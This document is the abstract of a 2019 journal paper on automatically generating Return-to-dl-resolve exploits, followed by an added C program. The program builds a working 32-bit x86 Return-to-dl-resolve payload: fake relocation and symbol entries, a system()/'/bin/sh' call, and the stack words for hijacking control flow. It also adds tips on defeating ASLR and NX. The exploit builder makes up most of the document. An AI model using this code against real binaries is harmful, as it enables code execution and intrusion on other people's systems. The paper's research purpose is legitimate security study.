Computer Science (计算机科学), 2019, Vol. 46, Issue 2: 127-132. doi: 10.11896/j.issn.1002-137X.2019.02.020
FANG Hao, WU Li-fa, WU Zhi-yong (方皓, 吴礼发, 吴志勇)
Abstract: Return-to-dl-resolve is a general-purpose exploitation technique that can defeat complex protection mechanisms. At present it is carried out almost entirely by hand: the researcher must analyse and understand ELF dynamic linking in depth, leak and resolve the address of an arbitrary library function, and assemble the attack payload, which makes the process very inefficient. This paper proposes an automated implementation of Return-to-dl-resolve based on symbolic execution. The method provides a symbolic execution environment for ELF executables, imposes constraints on the symbolic state at the program's crash point, and solves those constraints with a constraint solver; on this basis it implements R2dlAEG, a system that automatically generates Return-to-dl-resolve exploit code. Experimental results show that R2dlAEG constructs exploit code quickly and can hijack the program's control flow with the NX and ASLR protection mechanisms both enabled.
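The abstract describes the manual steps that R2dlAEG automates: understanding how the dynamic linker resolves a lazy PLT entry and assembling a payload that makes it resolve an attacker-chosen name. The following C program is an added example, not code from the paper or from R2dlAEG. It lays out the data blob and stack words of a classic 32-bit x86 Return-to-dl-resolve against a non-PIE glibc binary, following what `_dl_fixup()` reads: a fake `Elf32_Rel` reached through DT_JMPREL + reloc_arg, a fake `Elf32_Sym` reached through DT_SYMTAB + R_SYM(r_info) * 16, and a symbol name reached through DT_STRTAB + st_name. Every address in `dyn_layout` is a constructed value standing in for what one would read from the target with `readelf -d`; the functions `ret2dl_build` and `ret2dl_check` are this example's own names.

```c
/* Added example (not from the paper): lays out a 32-bit x86 return-to-dl-resolve
 * payload the way glibc's _dl_fixup() reads it. Addresses are ASSUMED values. */
#include <stdint.h>
#include <string.h>

/* Same layout as Elf32_Rel / Elf32_Sym in <elf.h>, redefined so the example
 * compiles on hosts without that header (little-endian host assumed). */
struct elf32_rel { uint32_t r_offset, r_info; };
struct elf32_sym { uint32_t st_name, st_value, st_size;
                   uint8_t st_info, st_other; uint16_t st_shndx; };

#define R_386_JMP_SLOT  7            /* _dl_fixup asserts R_TYPE(r_info) == 7 */
#define STB_GLOBAL      1
#define STT_FUNC        2
#define RET_PLACEHOLDER 0x41414141u  /* return address the callee will see */

struct dyn_layout {   /* DT_STRTAB, DT_SYMTAB, DT_JMPREL (readelf -d) and PLT0 */
    uint32_t strtab, symtab, jmprel, plt0;
    uint32_t data;    /* writable address we control, e.g. in .bss */
};

struct ret2dl {
    uint8_t  data[96];   /* fake rel, fake sym, name, argument, result slot */
    size_t   data_len;
    uint32_t stack[4];   /* words at ESP when returning into PLT0 */
    size_t   stack_len;
    uint32_t reloc_arg, sym_index, sym_addr, str_addr, arg_addr, resolved_slot;
};

/* Fills the data blob and stack words; returns 0, or -1 if they do not fit. */
int ret2dl_build(const struct dyn_layout *l, const char *func, const char *arg,
                 struct ret2dl *o)
{
    struct elf32_rel rel;
    struct elf32_sym sym;
    size_t cur = sizeof rel;

    if (cur + 15 + sizeof sym + strlen(func) + strlen(arg) + 2 + 7 > sizeof o->data)
        return -1;
    memset(o, 0, sizeof *o);
    /* The fake Elf32_Rel sits at the start of the blob. On i386 reloc_arg is a
     * byte offset from DT_JMPREL (on x86_64 it is an index into .rela.plt). */
    o->reloc_arg = l->data - l->jmprel;
    /* _dl_fixup reads symtab[R_SYM(r_info)], so the fake Elf32_Sym must lie at
     * a multiple of sizeof(Elf32_Sym) == 16 bytes from DT_SYMTAB: pad to that. */
    cur += (16u - ((l->data + (uint32_t)cur - l->symtab) & 0xfu)) & 0xfu;
    o->sym_addr  = l->data + (uint32_t)cur;
    o->sym_index = (o->sym_addr - l->symtab) / (uint32_t)sizeof sym;
    cur += sizeof sym;
    /* Symbol name, found through DT_STRTAB + st_name. */
    o->str_addr = l->data + (uint32_t)cur;
    memcpy(o->data + cur, func, strlen(func) + 1);
    cur += strlen(func) + 1;
    /* First argument of the resolved function, e.g. "/bin/sh" for system(). */
    o->arg_addr = l->data + (uint32_t)cur;
    memcpy(o->data + cur, arg, strlen(arg) + 1);
    cur += strlen(arg) + 1;
    /* r_offset must be writable: _dl_fixup stores the resolved address there. */
    cur = (cur + 3) & ~(size_t)3;
    o->resolved_slot = l->data + (uint32_t)cur;
    o->data_len = cur + 4;

    rel.r_offset = o->resolved_slot;
    rel.r_info   = (o->sym_index << 8) | R_386_JMP_SLOT;
    memcpy(o->data, &rel, sizeof rel);
    memset(&sym, 0, sizeof sym);  /* st_other = 0 (STV_DEFAULT) or the lookup is skipped */
    sym.st_name = o->str_addr - l->strtab;
    sym.st_info = (STB_GLOBAL << 4) | STT_FUNC;
    memcpy(o->data + (o->sym_addr - l->data), &sym, sizeof sym);

    /* PLT0 pushes the link_map and jumps to _dl_runtime_resolve, which pops
     * reloc_arg, resolves the name and jumps to it with [ret][arg] as its frame. */
    o->stack[0] = l->plt0;
    o->stack[1] = o->reloc_arg;
    o->stack[2] = RET_PLACEHOLDER;
    o->stack[3] = o->arg_addr;
    o->stack_len = 4;
    return 0;
}

/* Re-reads the blob the way _dl_fixup would; returns 1 if every lookup lands
 * inside the blob and passes the linker's checks, else 0. */
int ret2dl_check(const struct dyn_layout *l, const struct ret2dl *o)
{
    struct elf32_rel rel;
    struct elf32_sym sym;
    uint32_t end = l->data + (uint32_t)o->data_len, sym_addr, str_addr;
    uint32_t rel_addr = l->jmprel + o->reloc_arg;

    if (rel_addr < l->data || rel_addr + sizeof rel > end) return 0;
    memcpy(&rel, o->data + (rel_addr - l->data), sizeof rel);
    if ((rel.r_info & 0xffu) != R_386_JMP_SLOT) return 0;
    if (rel.r_offset < l->data || rel.r_offset + 4 > end) return 0;
    sym_addr = l->symtab + (rel.r_info >> 8) * (uint32_t)sizeof sym;
    if (sym_addr < l->data || sym_addr + sizeof sym > end) return 0;
    memcpy(&sym, o->data + (sym_addr - l->data), sizeof sym);
    if ((sym.st_other & 3u) != 0) return 0;  /* ELF32_ST_VISIBILITY(st_other) */
    str_addr = l->strtab + sym.st_name;
    if (str_addr < l->data || str_addr >= end) return 0;
    return memchr(o->data + (str_addr - l->data), '\0', end - str_addr) != NULL;
}
```

Three caveats a practitioner would add before using such a layout. First, the technique needs no library address at all, which is why it survives ASLR of libc, but the `.dynamic` tables and PLT0 of the main binary must be at known addresses, so the binary is assumed non-PIE (or its base already known). Second, because the fake symbol index is large, `_dl_fixup` also reads the half-word at DT_VERSYM + 2 * sym_index when the binary carries a DT_VERSYM entry; that address must be readable, and the usual way to keep the version lookup harmless is to position the blob so that half-word reads as zero. Third, on x86_64 the structures are 24 bytes, reloc_arg is an index rather than a byte offset, and the `.rela.plt` addend is used, so the arithmetic above must be redone for that ABI.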